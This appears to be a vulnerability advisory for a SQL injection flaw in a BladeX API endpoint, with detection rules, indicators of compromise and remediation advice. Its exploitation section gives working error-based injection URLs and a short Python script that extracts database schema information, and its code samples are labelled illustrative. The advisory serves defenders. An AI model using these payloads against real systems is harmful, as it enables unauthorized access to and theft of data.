CVE-2024-3039
Executive Summary
CVE-2024-3039 is a critical SQL injection vulnerability discovered in Shanghai Brad Technology BladeX version 3.4.0. The flaw resides in the /api/blade-user/export-user API endpoint, where unsanitized user input is directly concatenated into SQL queries. An attacker can exploit this by sending a crafted payload such as updatexml(1,concat(0x3f,md5(123456),0x3f),1)=1 to trigger error-based SQL injection, potentially extracting sensitive data, modifying database contents, or executing administrative operations. The vulnerability is remotely exploitable with no authentication required, and a public proof-of-concept (PoC) exists. The vendor has not responded to disclosure attempts, leaving the product unpatched. This report provides a comprehensive technical analysis, detection rules, exploitation guidance, and mitigation strategies.

Supply Chain & Package Security
BladeX is a Java-based enterprise application framework. The vulnerable component is part of the core BladeX API module. No package manager (NPM, PyPI, Go, Ruby) is involved; however, organizations using BladeX should verify their deployment version and apply network-level controls until a patch is available.

Deep Dive & Mechanics
The vulnerability exists in the export-user function of the BladeX API. The endpoint accepts user-supplied parameters (likely via GET or POST) and passes them unsanitized into a SQL query. The specific payload updatexml(1,concat(0x3f,md5(123456),0x3f),1)=1 exploits error-based SQL injection by causing a deliberate XML parsing error that reveals database information in the error message. The updatexml() function is used to generate an error that includes the result of the concat() expression, which contains the MD5 hash of 123456 as a proof-of-concept. This technique allows an attacker to extract data character by character by manipulating the query.
The injection point is likely in a WHERE clause or similar SQL context. The attacker can inject arbitrary SQL commands, including UNION-based queries, time-based blind injection, or stacked queries (if supported by the database backend, typically MySQL). The lack of input validation or parameterized queries makes this a classic SQL injection vulnerability.
Vulnerable vs. Patched Code
Vulnerable Code (BladeX 3.4.0):
// Example of vulnerable code pattern
public void exportUser(HttpServletRequest request, HttpServletResponse response) {
String userId = request.getParameter("userId");
String sql = "SELECT * FROM users WHERE id = " + userId; // Direct concatenation
// Execute query...
}
Patched Code (Hypothetical):
// Example of patched code using parameterized queries
public void exportUser(HttpServletRequest request, HttpServletResponse response) {
String userId = request.getParameter("userId");
String sql = "SELECT * FROM users WHERE id = ?";
PreparedStatement pstmt = connection.prepareStatement(sql);
pstmt.setString(1, userId);
// Execute query...
}
Note: No official patch exists. The above is a recommended fix.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Target running BladeX 3.4.0 with the
/api/blade-user/export-userendpoint exposed. - Network access to the target.
Exploitation Steps:
- Identify the vulnerable endpoint:
http://target/api/blade-user/export-user - Inject the PoC payload via a parameter (e.g.,
userId):http://target/api/blade-user/export-user?userId=1 AND updatexml(1,concat(0x3f,md5(123456),0x3f),1)=1 - Observe the error message containing the MD5 hash
e10adc3949ba59abbe56e057f20f883e(MD5 of123456). - Extract data using error-based techniques:
http://target/api/blade-user/export-user?userId=1 AND updatexml(1,concat(0x3f,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x3f),1)=1
Automated Exploit (Python):
import requests
target = "http://target/api/blade-user/export-user"
payload = "1 AND updatexml(1,concat(0x3f,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users'),0x3f),1)=1"
params = {"userId": payload}
response = requests.get(target, params=params)
print(response.text)
Blue Team
Detection:
- Monitor for requests containing
updatexml,extractvalue,concat, or0x3fin query parameters. - Alert on error messages containing SQL syntax errors or XML parsing errors.
- Use WAF rules to block SQL injection patterns.
Hunting:
- Search logs for
userIdparameter values containing SQL keywords (AND, OR, UNION, SELECT). - Look for repeated requests with varying payloads to the
/api/blade-user/export-userendpoint.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests to
/api/blade-user/export-userwith parameters containingupdatexml,extractvalue, orconcat. - Error responses containing
XPATH syntax errorormysql_fetch_array(). - Outbound database queries from the application server to the database server with suspicious patterns.
File IOCs:
- Log entries with SQL injection payloads in the
userIdparameter. - Temporary files created by the database during error logging.
Behavioral IOCs:
- Unusual database error messages in application logs.
- Unexpected database queries from the application server.

Remediation & Mitigation
Immediate Actions:
- Isolate the vulnerable endpoint: Block access to
/api/blade-user/export-userat the network perimeter (WAF, firewall) until a patch is applied. - Apply virtual patching: Use WAF rules to block SQL injection patterns (e.g.,
updatexml,extractvalue,concat). - Upgrade BladeX: If a patched version becomes available, upgrade immediately. Currently, no patch exists.
Long-term Fixes:
- Implement parameterized queries: Replace dynamic SQL with prepared statements in all database interactions.
- Input validation: Validate and sanitize all user inputs, especially those used in SQL queries.
- Least privilege: Ensure the database user used by the application has minimal necessary permissions.
- Regular security audits: Conduct code reviews and penetration testing to identify similar vulnerabilities.
Workaround:
- Disable the
export-userfunctionality entirely by removing or commenting out the endpoint in the application code.
